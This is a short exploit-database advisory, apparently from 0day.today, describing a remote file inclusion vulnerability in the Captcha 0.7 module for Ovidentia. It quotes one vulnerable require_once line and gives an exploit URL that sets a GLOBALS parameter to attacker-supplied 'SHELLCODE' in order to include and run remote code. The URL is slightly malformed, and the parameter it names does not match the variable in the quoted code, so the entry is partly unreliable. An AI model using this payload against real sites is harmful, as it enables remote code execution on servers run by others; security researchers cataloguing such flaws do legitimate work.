id: 24738
date: 12/16/2015
title: Ovidentia Captcha (Version 0.7) Module Remote File Inclusion Vulnerability
author: GoLd_M
cves: 

# Title: Ovidentia Module  Captcha (Version 0.7 )  Remote File Inclusion 
# Author: GoLd_M
# Download: http://www.ovidentia.org/modules/babArticle_731
  
PoC :
  
\captcha-0-7\programs\captcha.class.php
------------------------------------------------------
  
  require_once $GLOBALS['babInstallPath'].'utilit/functionalityincl.php';
  
-------------------------------------------------------
  
[+]Sploit2: http://[s0me0ne/captcha-0-7/programs/captcha.class.php?GLOBALS[babAddonPhpPath]=SHELLCODE?

#  0day.today [2023-03-24]  #